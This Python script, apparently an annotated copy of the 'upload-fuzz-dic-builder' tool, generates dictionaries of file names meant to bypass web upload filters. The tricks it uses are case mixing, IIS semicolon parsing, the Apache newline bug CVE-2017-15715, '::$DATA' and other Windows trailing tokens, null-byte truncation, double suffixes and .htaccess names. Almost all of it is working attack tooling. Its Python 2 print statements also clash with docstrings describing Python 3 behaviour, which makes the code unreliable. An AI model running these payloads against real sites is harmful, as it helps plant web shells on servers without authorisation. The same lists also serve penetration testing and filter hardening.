#coding=utf-8
'''
author: c0ny1<root@gv7.me>
github: https://github.com/c0ny1/upload-fuzz-dic-builder
date: 2018-11-04 23:16
description: 生成符合漏洞实际场景fuzz字典的脚本
'''
import argparse
import copy
import urllib
## Suffix lists the generator treats as server-parsable, one per language
## family. Each list already carries a few mixed-case spellings; the
## __main__ block adds full case mixing only for Windows targets.
## Defensive reading: an upload filter's allowlist must reject every entry
## here regardless of case, i.e. compare the extension case-insensitively.
html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml']
asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr']
php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2']
jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml']
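## Web middleware (IIS / Apache / Tomcat) parsing quirks
def iis_suffix_creater(suffix, allowed=None):
    """Return ``'<s>;.<allowed>'`` for every entry ``s`` of *suffix*.

    Args:
        suffix: iterable of script suffixes (e.g. ``'asp'``).
        allowed: the permitted upload suffix placed after ``;.``. When
            omitted the module-level global ``allow_suffix`` is read, which
            is what the original did unconditionally and what the
            ``__main__`` block (which sets that global) still relies on.
            Passing it explicitly makes the function usable outside the
            script entry point.

    Returns:
        list of str, one entry per input suffix, in input order.

    Raises:
        NameError: if *allowed* is omitted and the global ``allow_suffix``
            has not been defined (unchanged from the original behaviour).
    """
    # Resolve lazily so the global is only touched when no argument is given.
    target = allow_suffix if allowed is None else allowed
    return ['%s;.%s' % (s, target) for s in suffix]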
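def apache_suffix_creater(suffix):
    """Return two Apache-oriented variants for every entry of *suffix*.

    For each suffix ``s`` the result holds ``'s.xxx'`` (an unknown trailing
    extension) followed by ``'s\\n'`` (a trailing newline, CVE-2017-15715),
    in that order.

    The newline used to be produced by ``urllib.unquote('%0a')``; it is the
    same value written as the literal ``'\\n'``, which drops the
    Python-2-only ``urllib.unquote`` dependency from this block.

    Args:
        suffix: iterable of script suffixes.

    Returns:
        list of str, two entries per input suffix, in input order.
    """
    res = []
    for s in suffix:
        res.append('%s.xxx' % s)
        res.append('%s\n' % s)  # CVE-2017-15715
    return res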
# Trailing tokens appended to each suffix by tomcat_suffix_creater(); the
# __main__ block calls that creator only for Windows targets ('win'/'all').
win_tomcat = ['%20','::$DATA','/']
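def tomcat_suffix_creater(suffix, tokens=None):
    """Append every trailing token to every suffix.

    Args:
        suffix: iterable of script suffixes.
        tokens: trailing strings to append. Defaults to the module-level
            ``win_tomcat`` list, which is what the original always used and
            what the ``__main__`` block still gets; accepting it explicitly
            lets the function be exercised without the module globals.

    Returns:
        list of ``suffix + token`` strings for every pair, suffix-major
        order (all tokens of the first suffix, then the second, ...).
    """
    # Materialise once so a one-shot iterable is not exhausted on the first
    # suffix, and so the global is only read when no argument is given.
    trailers = list(win_tomcat if tokens is None else tokens)
    return ['%s%s' % (s, t) for s in suffix for t in trailers]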
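## OS characteristics
def str_81_to_ff():
    """Return the 127 single characters with codes 0x81..0xFF, ascending.

    The original decoded each one as ``urllib.unquote('%XX')``; on Python 2
    that is exactly the raw byte ``chr(i)``, so the character is produced
    directly and the block no longer depends on the Python-2-only
    ``urllib.unquote`` (whose Python 3 counterpart would not return the raw
    byte for these codes).

    Returns:
        list of 127 one-character strings, from '\\x81' to '\\xff'.
    """
    return [chr(code) for code in range(0x81, 0x100)]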
# Trailing tokens appended to each suffix by windows_suffix_creater(): a
# fixed set of literal strings ('%20' and '%00' stay percent-encoded here,
# they are not decoded) plus every character 0x81..0xFF from str_81_to_ff().
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()
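def windows_suffix_creater(suffix, tokens=None):
    """Append every trailing token to every suffix.

    Args:
        suffix: iterable of script suffixes.
        tokens: trailing strings to append. Defaults to the module-level
            ``windows_os`` list, which is what the original always used and
            what the ``__main__`` block still gets; accepting it explicitly
            lets the function be exercised without the module globals.

    Returns:
        list of ``suffix + token`` strings for every pair, suffix-major
        order (all tokens of the first suffix, then the second, ...).
    """
    # Materialise once so a one-shot iterable is not exhausted on the first
    # suffix, and so the global is only read when no argument is given.
    trailers = list(windows_os if tokens is None else tokens)
    return ['%s%s' % (s, t) for s in suffix for t in trailers]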
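## Script-language null-byte truncation
def str_00_truncation(suffix,allow_suffix):
    """Return two null-byte-truncation forms of every entry of *suffix*.

    For each suffix ``s`` the result holds ``s + '%00.' + allow_suffix``
    (percent-encoded NUL) followed by ``s + '\\x00.' + allow_suffix`` (the
    raw NUL byte), in that order.

    The raw byte used to be obtained via ``urllib.unquote('%00')``; the
    literal ``'\\x00'`` is the same value and drops the Python-2-only
    ``urllib.unquote`` dependency from this block.

    Args:
        suffix: iterable of script suffixes.
        allow_suffix: the permitted upload suffix placed after the NUL.

    Returns:
        list of str, two entries per input suffix, in input order.
    """
    encoded_nul = '%00'
    raw_nul = '\x00'
    res = []
    for s in suffix:
        res.append('%s%s.%s' % (s, encoded_nul, allow_suffix))
        res.append('%s%s.%s' % (s, raw_nul, allow_suffix))
    return res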
## Every spelling of a word in which one contiguous run is upper-cased
def str_case_mixing(word):
    """Return the distinct case variants of *word* with one upper-cased run.

    The word is lower-cased first; then for every start/stop pair
    (``0 <= start <= stop <= len``) the slice ``[start:stop]`` is upper-cased
    and the rest left lower. The all-lowercase word is therefore included
    (empty run) and every variant appears once, in first-seen order. Only
    contiguous runs are produced, not every per-character combination.

    Args:
        word: the string to vary.

    Returns:
        list of str; empty for an empty word.
    """
    base = word.lower()
    length = len(base)
    ordered = {}
    for start in range(length):
        for stop in range(start, length + 1):
            variant = base[:start] + base[start:stop].upper() + base[stop:]
            ordered[variant] = None
    return list(ordered)
## Case mixing applied to a whole list
def list_case_mixing(li):
    """Concatenate str_case_mixing() of every entry of *li*.

    Duplicates across entries are kept; the caller de-duplicates later.

    Args:
        li: iterable of strings.

    Returns:
        list of str.
    """
    out = []
    for item in li:
        out.extend(str_case_mixing(item))
    return out
## Double-suffix generation
def str_double_suffix_creater(suffix):
    """Return *suffix* with a second copy of itself spliced in at every
    interior position.

    For ``'php'`` that is ``['pphphp', 'phphpp']``: the copy is inserted
    after the first character, then after the second, and so on, never at
    either end. Words of length 0 or 1 have no interior position and yield
    an empty list.

    Args:
        suffix: the suffix string.

    Returns:
        list of str, ``len(suffix) - 1`` entries (or none).
    """
    return [suffix[:cut] + suffix + suffix[cut:] for cut in range(1, len(suffix))]
def list_double_suffix_creater(list_suffix):
    """Apply str_double_suffix_creater() to every entry and de-duplicate
    the combined result with duplicate_removal().

    Args:
        list_suffix: iterable of suffix strings.

    Returns:
        list of str with duplicates removed.
    """
    combined = []
    for entry in list_suffix:
        combined.extend(str_double_suffix_creater(entry))
    return duplicate_removal(combined)
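# De-duplicate a list
def duplicate_removal(li):
    """Return the distinct entries of *li* in first-seen order.

    ``dict.fromkeys`` keeps insertion order (CPython 3.7+), so the generated
    dictionary comes out in a reproducible order instead of the run-to-run
    set order of ``list(set(li))`` under hash randomisation. Entries must be
    hashable, as before.

    Args:
        li: iterable of hashable items.

    Returns:
        list with every distinct item once.
    """
    return list(dict.fromkeys(li))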
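# Drop blank entries from a list
def clear_list(li):
    """Remove every ``''``, ``' '`` and ``None`` entry from *li* in place
    and return it.

    The list is rewritten through a slice assignment rather than by calling
    ``remove()`` while iterating it: the old loop skipped the element that
    followed each removal, so two adjacent blanks left one behind. Callers
    that use the return value and callers that relied on the in-place
    mutation both keep working.

    Args:
        li: list to clean; mutated in place.

    Returns:
        the same list object, with the blank entries removed.
    """
    blanks = ('', ' ', None)
    li[:] = [item for item in li if item not in blanks]
    return li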
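def parse_args(argv=None):
    """Parse the command-line options.

    Args:
        argv: argument list to parse. ``None`` (the default, and the
            original behaviour) means ``sys.argv[1:]``; passing a list makes
            the function callable from tests without touching ``sys.argv``.

    Returns:
        argparse.Namespace with attributes ``upload_file_name``,
        ``allow_suffix``, ``language``, ``middleware``, ``os``,
        ``double_suffix`` and ``output_filename``.
    """
    parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder',
                                     formatter_class=argparse.RawTextHelpFormatter,
                                     description='')
    parser.add_argument('-n', '--upload-filename', metavar='', dest='upload_file_name', type=str, default='test',
                        help=u'Upload file name')
    parser.add_argument('-a', '--allow-suffix', metavar='', dest='allow_suffix', type=str, default='jpg',
                        help=u'Allowable upload suffix')
    parser.add_argument('-l', '--language', metavar='', dest='language', choices=['asp', 'php', 'jsp', 'all'], type=str, default='all',
                        help='Uploaded script language')
    parser.add_argument('-m', '--middleware', metavar='', dest='middleware', choices=['iis', 'apache', 'tomcat', 'all'], type=str, default='all',
                        help='Middleware used in Web System')
    parser.add_argument('--os', metavar='', dest='os', choices=['win', 'linux', 'all'], type=str, default='all',
                        help='Target operating system type')
    # store_true flag: present means generate double-suffix variants.
    parser.add_argument('-d', '--double-suffix', dest='double_suffix', default=False, action='store_true',
                        help='Is it possible to generate double suffix?')
    parser.add_argument('-o', '--output', metavar='', dest='output_filename', type=str, default='upload_fuzz_dic.txt',
                        help='Output file')
    return parser.parse_args(argv)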
if __name__ == '__main__':
    # Script entry point: read the CLI options, build each family of suffix
    # variants from the module-level lists, merge and de-duplicate them,
    # then write '<upload_file_name>.<variant>' lines followed by the
    # .htaccess names to the output file.
    args = parse_args()
    upload_file_name = args.upload_file_name
    # Module global: iis_suffix_creater() reads allow_suffix by name.
    allow_suffix = args.allow_suffix
    output_filename =args.output_filename
    language = args.language
    middleware = args.middleware
    os = args.os
    double_suffix =args.double_suffix

    # IIS implies a Windows host, so the --os choice is forced to 'win'.
    if middleware == 'iis':
        os = 'win'
    ###################################
    # NOTE(review): opened without a 'with' block; the handle is closed only
    # by the explicit f.close() at the end, so an exception on the way there
    # leaks it.
    f = open(output_filename,'w')
    parse_suffix = []
    case_parse_suffix = []
    middleware_parse_suffix = []
    htaccess_suffix = []
    os_parse_suffix = []
    double_parse_suffix = []

    # Parsable suffixes for the chosen language. The per-language lists that
    # were not selected are rebound to [] so the middleware section below
    # only sees the chosen language.
    if language == 'asp':
        html_parse_suffix = []
        php_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = asp_parse_suffix
    elif language == 'php':
        # html_parse_suffix is deliberately kept alongside php.
        asp_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = html_parse_suffix + php_parse_suffix
    elif language == 'jsp':
        html_parse_suffix = []
        asp_parse_suffix = []
        php_parse_suffix = []
        parse_suffix = jsp_parse_suffix
    else: # language == 'all'
        parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix
    print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix)

    # Case-mixed variants are generated only for Windows targets ('win' or
    # 'all'); for 'linux' the case_* names simply alias the plain lists.
    if os == 'win' or os == 'all':
        case_html_parse_suffix = list_case_mixing(html_parse_suffix)
        case_asp_parse_suffix = list_case_mixing(asp_parse_suffix)
        case_php_parse_suffix = list_case_mixing(php_parse_suffix)
        case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix)
        case_parse_suffix = list_case_mixing(parse_suffix)
        print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix)
    else: # os == 'linux'
        case_html_parse_suffix = html_parse_suffix
        case_asp_parse_suffix = asp_parse_suffix
        case_php_parse_suffix = php_parse_suffix
        case_jsp_parse_suffix = jsp_parse_suffix
        case_parse_suffix = parse_suffix

    # Middleware-specific variants. With middleware 'all' every creator runs
    # and the three results are concatenated.
    if middleware == 'iis':
        case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
    elif middleware == 'apache':
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
    elif middleware == 'tomcat' and os == 'linux':
        middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
    elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
    else:
        # NOTE(review): the 'iis' branch above feeds asp+php+jsp to
        # iis_suffix_creater, whereas this 'all' branch feeds only asp+php;
        # confirm whether the difference is intended.
        case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
        iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
        middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix
    middleware_parse_suffix = duplicate_removal(middleware_parse_suffix)
    print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix)

    # .htaccess names: case-mixed for Windows targets, the single literal
    # name for linux, nothing when the middleware is not Apache/all.
    if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
        htaccess_suffix = str_case_mixing(".htaccess")
        print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix)
    elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
        htaccess_suffix = ['.htaccess']
        print u'[+] 加入1条.htaccess'
    else:
        htaccess_suffix = []

    # OS-specific variants: windows_os trailing tokens for 'win', the plain
    # parsable list for 'linux', both for 'all'.
    if os == 'win':
        os_parse_suffix = windows_suffix_creater(case_parse_suffix)
    elif os == 'linux':
        os_parse_suffix = parse_suffix
    else:
        win_suffix = windows_suffix_creater(case_parse_suffix)
        linux_suffix = parse_suffix
        os_parse_suffix = win_suffix + linux_suffix
    os_parse_suffix = duplicate_removal(os_parse_suffix)
    print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix)

    # Null-byte truncation variants before the allowed suffix. (The variable
    # keeps the original 'suffux' spelling; it is referenced again below.)
    language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix)

    # Double-suffix variants, built from the case-mixed list, only with -d.
    if double_suffix:
        double_parse_suffix = list_double_suffix_creater(case_parse_suffix)
        print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix)
    else:
        double_parse_suffix = []

    all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix
    all_parse_suffix = duplicate_removal(all_parse_suffix)
    all_parse_suffix = clear_list(all_parse_suffix)

    # Write the output file: one '<name>.<suffix>' line per entry, then the
    # .htaccess names as they are (whole file names, not suffixes).
    num = len(all_parse_suffix)
    for i in all_parse_suffix:
        str = '%s.%s' % (upload_file_name,i)  # shadows the builtin str
        f.write(str)
        f.write('\n')
    num += len(htaccess_suffix)
    for i in htaccess_suffix:
        f.write(i)
        f.write('\n')
    f.close()
    print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename)